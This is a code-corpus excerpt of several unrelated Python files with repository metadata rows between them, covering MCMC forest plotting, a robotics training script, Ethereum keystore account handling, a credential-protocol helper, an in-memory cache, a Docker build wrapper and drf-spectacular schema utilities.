main=None, xtitle=None, xrange=None, ylabels=None,
chain_spacing=0.05, vline=0, gs=None):
""" Forest plot (model summary plot)
Generates a "forest plot" of 100*(1-alpha)% credible intervals for either
the set of variables in a given model, or a specified set of nodes.
:Arguments:
trace_obj: NpTrace or MultiTrace object
Trace(s) from an MCMC sample.
vars: list
List of variables to plot (defaults to None, which results in all
variables plotted).
alpha (optional): float
Alpha value for (1-alpha)*100% credible intervals (defaults to
0.05).
quartiles (optional): bool
Flag for plotting the interquartile range, in addition to the
(1-alpha)*100% intervals (defaults to True).
rhat (optional): bool
Flag for plotting Gelman-Rubin statistics. Requires 2 or more
chains (defaults to True).
main (optional): string
Title for main plot. Passing False results in titles being
suppressed; passing None (default) results in default titles.
xtitle (optional): string
Label for x-axis. Defaults to no label
xrange (optional): list or tuple
Range for x-axis. Defaults to matplotlib's best guess.
ylabels (optional): list or array
User-defined labels for each variable. If not provided, the node
__name__ attributes are used.
chain_spacing (optional): float
Plot spacing between chains (defaults to 0.05).
vline (optional): numeric
Location of vertical reference line (defaults to 0).
gs : GridSpec
Matplotlib GridSpec object. Defaults to None.
Returns
-------
gs : matplotlib GridSpec
"""
import matplotlib.pyplot as plt
from matplotlib import gridspec
# Quantiles to be calculated
qlist = [100 * alpha / 2, 50, 100 * (1 - alpha / 2)]
if quartiles:
qlist = [100 * alpha / 2, 25, 50, 75, 100 * (1 - alpha / 2)]
# Range for x-axis
plotrange = None
# Number of chains
chains = None
# Subplots
interval_plot = None
rhat_plot = None
nchains = trace_obj.nchains
if nchains > 1:
from .diagnostics import gelman_rubin
R = gelman_rubin(trace_obj)
if vars is not None:
R = {v: R[v] for v in vars}
else:
# Can't calculate Gelman-Rubin with a single trace
rhat = False
if vars is None:
vars = trace_obj.varnames
# Empty list for y-axis labels
labels = []
if gs is None:
# Initialize plot
if rhat and nchains > 1:
gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
else:
gs = gridspec.GridSpec(1, 1)
# Subplot for confidence intervals
interval_plot = plt.subplot(gs[0])
trace_quantiles = quantiles(trace_obj, qlist, squeeze=False)
hpd_intervals = hpd(trace_obj, alpha, squeeze=False)
for j, chain in enumerate(trace_obj.chains):
# Counter for current variable
var = 1
for varname in vars:
var_quantiles = trace_quantiles[chain][varname]
quants = [var_quantiles[v] for v in qlist]
var_hpd = hpd_intervals[chain][varname].T
# Substitute HPD interval for quantile
quants[0] = var_hpd[0].T
quants[-1] = var_hpd[1].T
# Ensure x-axis contains range of current interval
if plotrange:
plotrange = [min(
plotrange[0],
np.min(quants)),
max(plotrange[1],
np.max(quants))]
else:
plotrange = [np.min(quants), np.max(quants)]
# Number of elements in current variable
value = trace_obj.get_values(varname, chains=[chain])[0]
k = np.size(value)
# Append variable name(s) to list
if not j:
if k > 1:
names = var_str(varname, np.shape(value))
labels += names
else:
labels.append(varname)
# labels.append('\n'.join(varname.split('_')))
# Add spacing for each chain, if more than one
e = [0] + [(chain_spacing * ((i + 2) / 2)) *
(-1) ** i for i in range(nchains - 1)]
# Deal with multivariate nodes
if k > 1:
for i, q in enumerate(np.transpose(quants).squeeze()):
# Y coordinate with jitter
y = -(var + i) + e[j]
if quartiles:
# Plot median
plt.plot(q[2], y, 'bo', markersize=4)
# Plot quartile interval
plt.errorbar(
x=(q[1],
q[3]),
y=(y,
y),
linewidth=2,
color='b')
else:
# Plot median
plt.plot(q[1], y, 'bo', markersize=4)
# Plot outer interval
plt.errorbar(
x=(q[0],
q[-1]),
y=(y,
y),
linewidth=1,
color='b')
else:
# Y coordinate with jitter
y = -var + e[j]
if quartiles:
# Plot median
plt.plot(quants[2], y, 'bo', markersize=4)
# Plot quartile interval
plt.errorbar(
x=(quants[1],
quants[3]),
y=(y,
y),
linewidth=2,
color='b')
else:
# Plot median
plt.plot(quants[1], y, 'bo', markersize=4)
# Plot outer interval
plt.errorbar(
x=(quants[0],
quants[-1]),
y=(y,
y),
linewidth=1,
color='b')
# Increment index
var += k
labels = ylabels if ylabels is not None else labels
# Update margins
left_margin = np.max([len(x) for x in labels]) * 0.015
gs.update(left=left_margin, right=0.95, top=0.9, bottom=0.05)
# Define range of y-axis
plt.ylim(-var + 0.5, -0.5)
datarange = plotrange[1] - plotrange[0]
plt.xlim(plotrange[0] - 0.05 * datarange, plotrange[1] + 0.05 * datarange)
# Add variable labels
plt.yticks([-(l + 1) for l in range(len(labels))], labels)
# Add title
if main is not False:
plot_title = main or str(int((
1 - alpha) * 100)) + "% Credible Intervals"
plt.title(plot_title)
# Add x-axis label
if xtitle is not None:
plt.xlabel(xtitle)
# Constrain to specified range
if xrange is not None:
plt.xlim(*xrange)
# Remove ticklines on y-axes
for ticks in interval_plot.yaxis.get_major_ticks():
ticks.tick1On = False
ticks.tick2On = False
for loc, spine in interval_plot.spines.items():
if loc in ['bottom', 'top']:
pass
# spine.set_position(('outward',10)) # outward by 10 points
elif loc in ['left', 'right']:
spine.set_color('none') # don't draw spine
# Reference line
plt.axvline(vline, color='k', linestyle='--')
# Genenerate Gelman-Rubin plot
if rhat and nchains > 1:
# If there are multiple chains, calculate R-hat
rhat_plot = plt.subplot(gs[1])
if main is not False:
plt.title("R-hat")
# Set x range
plt.xlim(0.9, 2.1)
# X axis labels
plt.xticks((1.0, 1.5, 2.0), ("1", "1.5", "2+"))
plt.yticks([-(l + 1) for l in range(len(labels))], "")
i = 1
for varname in vars:
chain = trace_obj.chains[0]
value = trace_obj.get_values(varname, chains=[chain])[0]
k = np.size(value)
if k > 1:
plt.plot([min(r, 2) for r in R[varname]], [-(j + i)
for j in range(k)], 'bo', markersize=4)
else:
plt.plot(min(R[varname], 2), -i, 'bo', markersize=4)
i += k
# Define range of y-axis
plt.ylim(-i + 0.5, -0.5)
# Remove ticklines on y-axes
for ticks in rhat_plot.yaxis.get_major_ticks():
ticks.tick1On = False
ticks.tick2On = False
for loc, spine in rhat_plot.spines.items():
if loc in ['bottom', 'top']:
pass
# spine.set_position(('outward',10)) # outward by 10 points
elif loc in ['left', 'right']:
spine.set_color('none') # don't draw spine
return gs
| 30.361011 | 89 | 0.511356 |
2b9d467dde816dbe452a3aba4c8c3119aea4b50f | 2,790 | py | Python | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | deprecated_examples/robotics/unimodal_image-pred.py | TianhaoFu/MultiBench | b174a3187124d6f92be1ff3b487eef292f7883bb | [
"MIT"
] | null | null | null | import sys
import os
sys.path.insert(0, os.getcwd())
import time
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import yaml
import os
from tqdm import tqdm
from fusions.robotics.sensor_fusion import SensorFusionSelfSupervised,roboticsConcat
from unimodals.robotics.encoders import (
ProprioEncoder, ForceEncoder, ImageEncoder, DepthEncoder, ActionEncoder,
)
from unimodals.common_models import MLP
from unimodals.robotics.decoders import ContactDecoder
from training_structures.Simple_Late_Fusion import train, test
from robotics_utils import set_seeds
from datasets.robotics.data_loader import get_data
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision import transforms
class selfsupervised:
def __init__(self, configs):
# ------------------------
# Sets seed and cuda
# ------------------------
use_cuda = True
self.configs = configs
self.device = torch.device("cuda" if use_cuda else "cpu")
set_seeds(configs["seed"], use_cuda)
self.encoders = [
ImageEncoder(configs['zdim'], alpha=configs['vision']),
DepthEncoder(configs['zdim'], alpha=configs['depth']),
ActionEncoder(configs['action_dim']),
]
"""
self.fusion = SensorFusionSelfSupervised(
device=self.device,
encoder=configs["encoder"],
deterministic=configs["deterministic"],
z_dim=configs["zdim"],
).to(self.device)
"""
self.fusion = roboticsConcat("image")
#self.head = ContactDecoder(z_dim=configs["zdim"], deterministic=configs["deterministic"])
self.head=MLP(544,128,4)
self.optimtype = optim.Adam
# losses
self.loss_contact_next = nn.BCEWithLogitsLoss()
self.train_loader, self.val_loader = get_data(self.device, self.configs,"/home/pliang/multibench/MultiBench-robotics/",unimodal='image',output='ee_yaw_next')
def train(self):
print(len(self.train_loader.dataset), len(self.val_loader.dataset))
with open('train_dataset.txt', 'w') as f:
for x in self.train_loader.dataset.dataset_path:
f.write(f'{x}\n')
with open('val_dataset.txt', 'w') as f:
for x in self.val_loader.dataset.dataset_path:
f.write(f'{x}\n')
train(self.encoders, self.fusion, self.head,
self.train_loader, self.val_loader,
15,task='regression',
optimtype=self.optimtype,
lr=self.configs['lr'],criterion=torch.nn.MSELoss())
with open('examples/robotics/training_default.yaml') as f:
configs = yaml.load(f)
selfsupervised(configs).train()
| 33.214286 | 165 | 0.657706 |
bf2d252c74ebd044b76fe504e27414cec7d79fa3 | 9,228 | py | Python | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | raiden/accounts.py | destenson/raiden-network--raiden | 845b3d9d8440e4f12b82854194fd6c9e1500b991 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import getpass
import json
import os
import sys
from binascii import hexlify, unhexlify
from bitcoin import privtopub
from ethereum.tools import keys
from ethereum.slogging import get_logger
log = get_logger(__name__)
def find_datadir():
home = os.path.expanduser('~')
if home == '~': # Could not expand user path
return None
if sys.platform == 'darwin':
datadir = os.path.join(home, 'Library', 'Ethereum')
# NOTE: Not really sure about cygwin here
elif sys.platform == 'win32' or sys.platform == 'cygwin':
datadir = os.path.join(home, 'AppData', 'Roaming', 'Ethereum')
elif os.name == 'posix':
datadir = os.path.join(home, '.ethereum')
else:
raise RuntimeError('Unsupported Operating System')
if not os.path.isdir(datadir):
return None
return datadir
def find_keystoredir():
datadir = find_datadir()
if datadir is None:
# can't find a data directory in the system
return None
keystore_path = os.path.join(datadir, 'keystore')
if not os.path.exists(keystore_path):
# can't find a keystore under the found data directory
return None
return keystore_path
class AccountManager:
def __init__(self, keystore_path=None):
self.keystore_path = keystore_path
self.accounts = {}
if self.keystore_path is None:
self.keystore_path = find_keystoredir()
if self.keystore_path is not None:
for f in os.listdir(self.keystore_path):
fullpath = os.path.join(self.keystore_path, f)
if os.path.isfile(fullpath):
try:
with open(fullpath) as data_file:
data = json.load(data_file)
self.accounts[str(data['address']).lower()] = str(fullpath)
except (ValueError, KeyError, IOError) as ex:
# Invalid file - skip
if f.startswith('UTC--'):
# Should be a valid account file - warn user
msg = 'Invalid account file'
if isinstance(ex, IOError):
msg = 'Can not read account file'
log.warning('%s %s: %s', msg, fullpath, ex)
def address_in_keystore(self, address):
if address is None:
return False
if address.startswith('0x'):
address = address[2:]
return address.lower() in self.accounts
def get_privkey(self, address, password=None):
"""Find the keystore file for an account, unlock it and get the private key
Args:
address(str): The Ethereum address for which to find the keyfile in the system
password(str): Mostly for testing purposes. A password can be provided
as the function argument here. If it's not then the
user is interactively queried for one.
Returns
str: The private key associated with the address
"""
if address.startswith('0x'):
address = address[2:]
address = address.lower()
if not self.address_in_keystore(address):
raise ValueError('Keystore file not found for %s' % address)
with open(self.accounts[address]) as data_file:
data = json.load(data_file)
# Since file was found prompt for a password if not already given
if password is None:
password = getpass.getpass('Enter the password to unlock %s: ' % address)
acc = Account(data, password, self.accounts[address])
return acc.privkey
class Account:
"""Represents an account. """
def __init__(self, keystore, password=None, path=None):
"""
Args:
keystore: the key store as a dictionary (as decoded from json)
locked: `True` if the account is locked and neither private nor public keys can be
accessed, otherwise `False`
path: absolute path to the associated keystore file (`None` for in-memory accounts)
"""
if path is not None:
path = os.path.abspath(path)
self.keystore = keystore
self.locked = True
self.path = path
self._privkey = None
self._address = None
try:
self._address = unhexlify(self.keystore['address'])
except KeyError:
pass
if password is not None:
self.unlock(password)
@classmethod
def load(cls, path, password=None):
"""Load an account from a keystore file.
Args:
path: full path to the keyfile
password: the password to decrypt the key file or `None` to leave it encrypted
"""
with open(path) as f:
keystore = json.load(f)
if not keys.check_keystore_json(keystore):
raise ValueError('Invalid keystore file')
return Account(keystore, password, path=path)
def dump(self, include_address=True, include_id=True):
"""Dump the keystore for later disk storage.
The result inherits the entries `'crypto'` and `'version`' from `account.keystore`, and
adds `'address'` and `'id'` in accordance with the parameters `'include_address'` and
`'include_id`'.
If address or id are not known, they are not added, even if requested.
Args:
include_address: flag denoting if the address should be included or not
include_id: flag denoting if the id should be included or not
"""
d = {
'crypto': self.keystore['crypto'],
'version': self.keystore['version']
}
if include_address and self.address is not None:
d['address'] = hexlify(self.address)
if include_id and self.uuid is not None:
d['id'] = self.uuid
return json.dumps(d)
def unlock(self, password):
"""Unlock the account with a password.
If the account is already unlocked, nothing happens, even if the password is wrong.
Raises:
ValueError: (originating in ethereum.keys) if the password is wrong
(and the account is locked)
"""
if self.locked:
self._privkey = keys.decode_keystore_json(self.keystore, password)
self.locked = False
self.address # get address such that it stays accessible after a subsequent lock
def lock(self):
"""Relock an unlocked account.
This method sets `account.privkey` to `None` (unlike `account.address` which is preserved).
After calling this method, both `account.privkey` and `account.pubkey` are `None.
`account.address` stays unchanged, even if it has been derived from the private key.
"""
self._privkey = None
self.locked = True
@property
def privkey(self):
"""The account's private key or `None` if the account is locked"""
if not self.locked:
return self._privkey
return None
@property
def pubkey(self):
"""The account's public key or `None` if the account is locked"""
if not self.locked:
return privtopub(self.privkey)
return None
@property
def address(self):
"""The account's address or `None` if the address is not stored in the key file and cannot
be reconstructed (because the account is locked)
"""
if self._address:
pass
elif 'address' in self.keystore:
self._address = unhexlify(self.keystore['address'])
elif not self.locked:
self._address = keys.privtoaddr(self.privkey)
else:
return None
return self._address
@property
def uuid(self):
"""An optional unique identifier, formatted according to UUID version 4, or `None` if the
account does not have an id
"""
try:
return self.keystore['id']
except KeyError:
return None
@uuid.setter
def uuid(self, value):
"""Set the UUID. Set it to `None` in order to remove it."""
if value is not None:
self.keystore['id'] = value
elif 'id' in self.keystore:
self.keystore.pop('id')
def sign_tx(self, tx):
"""Sign a Transaction with the private key of this account.
If the account is unlocked, this is equivalent to ``tx.sign(account.privkey)``.
Args:
tx: the :class:`ethereum.transactions.Transaction` to sign
Raises:
ValueError: if the account is locked
"""
if self.privkey:
log.info('signing tx', tx=tx, account=self)
tx.sign(self.privkey)
else:
raise ValueError('Locked account cannot sign tx')
def __repr__(self):
if self.address is not None:
address = hexlify(self.address)
else:
address = '?'
return '<Account(address={address}, id={id})>'.format(address=address, id=self.uuid)
| 34.304833 | 99 | 0.588535 |
c17773c596f7dc3bc80a29eadbdc94b663cd43ef | 1,691 | py | Python | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/protocols/issue_credential/v1_0/__init__.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from typing import Coroutine, Union
from ....connections.models.conn_record import ConnRecord
from ....core.error import BaseError
from .messages.credential_problem_report import (
CredentialProblemReport,
ProblemReportReason,
)
from .models.credential_exchange import V10CredentialExchange
def problem_report_for_record(
record: Union[ConnRecord, V10CredentialExchange],
desc_en: str,
) -> CredentialProblemReport:
"""
Create problem report for record.
Args:
record: connection or exchange record
desc_en: description text to include in problem report
"""
result = CredentialProblemReport(
description={
"en": desc_en,
"code": ProblemReportReason.ISSUANCE_ABANDONED.value,
},
)
if record:
thid = getattr(record, "thread_id", None)
if thid:
result.assign_thread_id(thid)
return result
async def report_problem(
err: BaseError,
desc_en: str,
http_error_class,
record: Union[ConnRecord, V10CredentialExchange],
outbound_handler: Coroutine,
):
"""
Send problem report response and raise corresponding HTTP error.
Args:
err: error for internal diagnostics
desc_en: description text to include in problem report (response)
http_error_class: HTTP error to raise
record: record to cite by thread in problem report
outbound_handler: outbound message handler
"""
if record:
await outbound_handler(
problem_report_for_record(record, desc_en),
connection_id=record.connection_id,
)
raise http_error_class(reason=err.roll_up) from err
| 26.421875 | 73 | 0.686576 |
df01734fab45f8b666075df224553691cc2f52d4 | 3,309 | py | Python | bauh/view/util/cache.py | leoneii/bauh | ceef6c30851552ec37e21ef6335a4cbdd126622f | [
"Zlib"
] | 1 | 2020-06-16T17:08:32.000Z | 2020-06-16T17:08:32.000Z | bauh/view/util/cache.py | octopusSD/bauh | c1f210fef87ddb4614b201ec2030330b71e43fe4 | [
"Zlib"
] | null | null | null | bauh/view/util/cache.py | octopusSD/bauh | c1f210fef87ddb4614b201ec2030330b71e43fe4 | [
"Zlib"
] | null | null | null | import datetime
import time
from threading import Lock, Thread
from bauh.api.abstract.cache import MemoryCache, MemoryCacheFactory
class DefaultMemoryCache(MemoryCache):
"""
A synchronized cache implementation
"""
def __init__(self, expiration_time: int):
super(DefaultMemoryCache, self).__init__()
self.expiration_time = expiration_time
self._cache = {}
self.lock = Lock()
def is_enabled(self):
return self.expiration_time < 0 or self.expiration_time > 0
def add(self, key: str, val: object):
if key and self.is_enabled():
self.lock.acquire()
self._add(key, val)
self.lock.release()
def _add(self, key: str, val: object):
if key:
self._cache[key] = {'val': val, 'expires_at': datetime.datetime.utcnow() + datetime.timedelta(seconds=self.expiration_time) if self.expiration_time > 0 else None}
def add_non_existing(self, key: str, val: object):
if key and self. is_enabled():
self.lock.acquire()
cur_val = self.get(key, lock=False)
if cur_val is None:
self._add(key, val)
self.lock.release()
def get(self, key: str, lock: bool = True):
if key and self.is_enabled():
val = self._cache.get(key)
if val:
expiration = val.get('expires_at')
if expiration and expiration <= datetime.datetime.utcnow():
if lock:
self.lock.acquire()
del self._cache[key]
if lock:
self.lock.release()
return None
return val['val']
def delete(self, key):
if key and self.is_enabled():
if key in self._cache:
self.lock.acquire()
del self._cache[key]
self.lock.release()
def keys(self):
return set(self._cache.keys()) if self.is_enabled() else set()
def clean_expired(self):
if self.is_enabled():
for key in self.keys():
self.get(key)
class CacheCleaner(Thread):
def __init__(self, check_interval: int = 15):
super(CacheCleaner, self).__init__(daemon=True)
self.caches = []
self.check_interval = check_interval
def register(self, cache: MemoryCache):
if cache.is_enabled():
self.caches.append(cache)
def run(self):
if self.caches:
while True:
for cache in self.caches:
cache.clean_expired()
time.sleep(self.check_interval)
class DefaultMemoryCacheFactory(MemoryCacheFactory):
def __init__(self, expiration_time: int, cleaner: CacheCleaner):
"""
:param expiration_time: default expiration time for all instantiated caches
:param cleaner
"""
super(DefaultMemoryCacheFactory, self).__init__()
self.expiration_time = expiration_time
self.cleaner = cleaner
def new(self, expiration: int = None) -> MemoryCache:
instance = DefaultMemoryCache(expiration if expiration is not None else self.expiration_time)
self.cleaner.register(instance)
return instance
| 29.283186 | 174 | 0.585675 |
4daae76531c62d58bc17b885ed6070b1093bf2ab | 689 | py | Python | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | atomisticparsers/namd/__init__.py | nomad-coe/atomistic-parsers | 7be55968fbf45e8e49377b58e745548c55c06788 | [
"Apache-2.0"
] | null | null | null | #
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD.
# See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .parser import NAMDParser
| 34.45 | 74 | 0.753266 |
a23341b4de3450dedbb7337b358d743e891ca2bc | 797 | py | Python | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | eagent/config.py | r-koike/eagent | b01f413ed90752fd1bbc4c6a59edf1c9020e11b8 | [
"MIT"
] | null | null | null | import json
import os
import glob
import copy
cfg_dict = {}
cfg_dirnames = []
cfg_dirnames.append(os.path.join("eagent", "configs", "ewalker"))
cfg_dirnames.append(os.path.join("eagent", "configs", "ehand_egg"))
default_filename = "default.json"
for cfg_dirname in cfg_dirnames:
with open(os.path.join(cfg_dirname, default_filename), "r") as f:
default_cfg = json.load(f)
for filename in glob.glob(os.path.join(cfg_dirname, "*")):
if os.path.basename(filename) == default_filename:
continue
with open(filename, "r") as f:
cfg_dict[os.path.basename(filename)] = copy.deepcopy(default_cfg)
cfg_dict[os.path.basename(filename)].update(json.load(f))
if __name__ == "__main__":
for k, v in cfg_dict.items():
print(k)
| 29.518519 | 77 | 0.667503 |
5e48ce1049a400e53ff708b11af29471702ac060 | 1,662 | py | Python | container.py | bowmanjd/elm-builder-ia32 | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | 1 | 2019-01-17T19:21:30.000Z | 2019-01-17T19:21:30.000Z | container.py | bowmanjd/elm-builder | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | null | null | null | container.py | bowmanjd/elm-builder | b2433d7a21a57f4b5b5eb162688cd9f573308344 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3.7
import subprocess
import sys
import fire
arches = {"i386": "i386/", "x86_64": ""}
class Container:
def __init__(self, name, repo="bowmanjd"):
self.docker_exe = ["docker"]
if not sys.platform == "win32":
self.docker_exe.insert(0, "sudo")
self.location = f"{repo}/{name}"
def build(self, filename="Dockerfile", base=None, clean=False, push=True):
if not base:
base = "debian:stable-slim"
default_base = True
else:
default_base = False
with open(filename) as f:
tpl = f.read()
base_cmd = self.docker_exe + ["build"]
if clean:
base_cmd.append("--no-cache")
for arch, prefix in arches.items():
cmd = base_cmd.copy()
tags = []
if default_base:
tags.append(arch)
if arch == "i386":
tags.append("latest")
tags.append(arch + "-" + base.replace(":", "-"))
for tag in tags:
cmd.extend(["-t", f"{self.location}:{tag}"])
cmd.append("-")
dockerfile = tpl.format(base=prefix + base, arch=arch)
subprocess.run(cmd, input=dockerfile, encoding="utf-8")
if push:
for tag in tags:
self.push(f"{self.location}:{tag}")
def push(self, location):
cmd = self.docker_exe + ["push", location]
subprocess.run(cmd)
def run(self):
cmd = self.docker_exe + ["run", "-it", self.location]
subprocess.run(cmd)
if __name__ == "__main__":
fire.Fire(Container)
| 29.157895 | 78 | 0.518051 |
46b76fe1b2bceb0626ba35e4b3e437b0b50ae1f1 | 19,712 | py | Python | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | drf_spectacular/utils.py | credativ/drf-spectacular | 2684fdae7c2c02d289fe8856d7f35a6d634b4a09 | [
"BSD-3-Clause"
] | null | null | null | import functools
import inspect
from typing import Any, Dict, List, Optional, Type, Union
from rest_framework.fields import Field, empty
from rest_framework.serializers import Serializer
from rest_framework.settings import api_settings
from drf_spectacular.drainage import error, get_view_methods, set_override, warn
from drf_spectacular.types import OpenApiTypes
_SerializerType = Union[Serializer, Type[Serializer]]
_SerializerTypeVariations = Union[OpenApiTypes, _SerializerType]
class PolymorphicProxySerializer(Serializer):
"""
This class is to be used with :func:`@extend_schema <.extend_schema>` to
signal a request/response might be polymorphic (accepts/returns data
possibly from different serializers). Usage usually looks like this:
.. code-block::
@extend_schema(
request=PolymorphicProxySerializer(
component_name='MetaPerson',
serializers=[
LegalPersonSerializer, NaturalPersonSerializer,
],
resource_type_field_name='person_type',
)
)
def create(self, request, *args, **kwargs):
return Response(...)
**Beware** that this is not a real serializer and it will raise an AssertionError
if used in that way. It **cannot** be used in views as `serializer_class`
or as field in an actual serializer. It is solely meant for annotation purposes.
Also make sure that each sub-serializer has a field named after the value of
``resource_type_field_name`` (discriminator field). Generated clients will likely
depend on the existence of this field. Setting ``resource_type_field_name``
to ``None`` will remove the discriminator altogether. This may be useful in
certain situations, but will most likely break client generation.
It is **strongly** recommended to pass the ``Serializers`` as **list**,
and by that let *drf-spectacular* retrieve the field and handle the mapping
automatically. In special circumstances, the field may not available when
drf-spectacular processes the serializer. In those cases you can explicitly state
the mapping with ``{'legal': LegalPersonSerializer, ...}``, but it is then your
responsibility to have a valid mapping.
"""
def __init__(
self,
component_name: str,
serializers: Union[List[_SerializerType], Dict[str, _SerializerType]],
resource_type_field_name: Optional[str],
many: bool = False,
):
self.component_name = component_name
self.serializers = serializers
self.resource_type_field_name = resource_type_field_name
super().__init__(many=many)
@property
def data(self):
self._trap()
def to_internal_value(self, data):
self._trap()
def to_representation(self, instance):
self._trap()
def _trap(self):
raise AssertionError(
"PolymorphicProxySerializer is an annotation helper and not supposed to "
"be used for real requests. See documentation for correct usage."
)
class OpenApiSchemaBase:
pass
class OpenApiExample(OpenApiSchemaBase):
"""
Helper class to document a API parameter / request body / response body
with a concrete example value.
The example will be attached to the operation object where appropriate,
i. e. where the given ``media_type``, ``status_code`` and modifiers match.
Example that do not match any scenario are ignored.
"""
def __init__(
self,
name: str,
value: Any = None,
external_value: str = '',
summary: str = '',
description: str = '',
request_only: bool = False,
response_only: bool = False,
media_type: str = 'application/json',
status_codes: Optional[List[str]] = None
):
self.name = name
self.summary = summary
self.description = description
self.value = value
self.external_value = external_value
self.request_only = request_only
self.response_only = response_only
self.media_type = media_type
self.status_codes = status_codes or ['200', '201']
class OpenApiParameter(OpenApiSchemaBase):
"""
Helper class to document request query/path/header/cookie parameters.
Can also be used to document response headers.
Please note that not all arguments apply to all ``location``/``type``/direction
variations, e.g. path parameters are ``required=True`` by definition.
For valid ``style`` choices please consult the
`OpenAPI specification <https://swagger.io/specification/#style-values>`_.
"""
QUERY = 'query'
PATH = 'path'
HEADER = 'header'
COOKIE = 'cookie'
def __init__(
self,
name: str,
type: Any = str,
location: str = QUERY,
required: bool = False,
description: str = '',
enum: Optional[List[Any]] = None,
deprecated: bool = False,
style: Optional[str] = None,
explode: Optional[bool] = None,
default: Any = None,
examples: Optional[List[OpenApiExample]] = None,
exclude: bool = False,
response: Union[bool, List[Union[int, str]]] = False,
):
self.name = name
self.type = type
self.location = location
self.required = required
self.description = description
self.enum = enum
self.deprecated = deprecated
self.style = style
self.explode = explode
self.default = default
self.examples = examples or []
self.exclude = exclude
self.response = response
class OpenApiResponse(OpenApiSchemaBase):
"""
Helper class to bundle a response object (``Serializer``, ``OpenApiType``,
raw schema, etc) together with a response object description and/or examples.
Examples can alternatively be provided via :func:`@extend_schema <.extend_schema>`.
This class is especially helpful for explicitly describing status codes on a
"Response Object" level.
"""
def __init__(
self,
response: Any = None,
description: Optional[str] = None,
examples: Optional[List[OpenApiExample]] = None
):
self.response = response
self.description = description
self.examples = examples or []
def extend_schema(
operation_id: Optional[str] = None,
parameters: Optional[List[OpenApiParameter]] = None,
request: Any = empty,
responses: Any = empty,
auth: Optional[List[str]] = None,
description: Optional[str] = None,
summary: Optional[str] = None,
deprecated: Optional[bool] = None,
tags: Optional[List[str]] = None,
exclude: bool = False,
operation: Optional[Dict] = None,
methods: Optional[List[str]] = None,
versions: Optional[List[str]] = None,
examples: Optional[List[OpenApiExample]] = None,
):
"""
Decorator mainly for the "view" method kind. Partially or completely overrides
what would be otherwise generated by drf-spectacular.
:param operation_id: replaces the auto-generated operation_id. make sure there
are no naming collisions.
:param parameters: list of additional or replacement parameters added to the
auto-discovered fields.
:param responses: replaces the discovered Serializer. Takes a variety of
inputs that can be used individually or combined
- ``Serializer`` class
- ``Serializer`` instance (e.g. ``Serializer(many=True)`` for listings)
- ``dict`` with status codes as keys and `Serializers` as values.
- ``dict`` with tuple (status_code, media_type) as keys and `Serializers` as values.
- basic types or instances of ``OpenApiTypes``
- :class:`.OpenApiResponse` for bundling any of the other choices together with
either a dedicated response description and/or examples.
- :class:`.PolymorphicProxySerializer` for signaling that
the operation may yield data from different serializers depending
on the circumstances.
:param request: replaces the discovered ``Serializer``. Takes a variety of inputs
- ``Serializer`` class/instance
- basic types or instances of ``OpenApiTypes``
- :class:`.PolymorphicProxySerializer` for signaling that the operation
accepts a set of different types of objects.
- ``dict`` with media_type as keys and one of the above as values.
:param auth: replace discovered auth with explicit list of auth methods
:param description: replaces discovered doc strings
:param summary: an optional short summary of the description
:param deprecated: mark operation as deprecated
:param tags: override default list of tags
:param exclude: set True to exclude operation from schema
:param operation: manually override what auto-discovery would generate. you must
provide a OpenAPI3-compliant dictionary that gets directly translated to YAML.
:param methods: scope extend_schema to specific methods. matches all by default.
:param versions: scope extend_schema to specific API version. matches all by default.
:param examples: attach request/response examples to the operation
:return:
"""
def decorator(f):
BaseSchema = (
# explicit manually set schema or previous view annotation
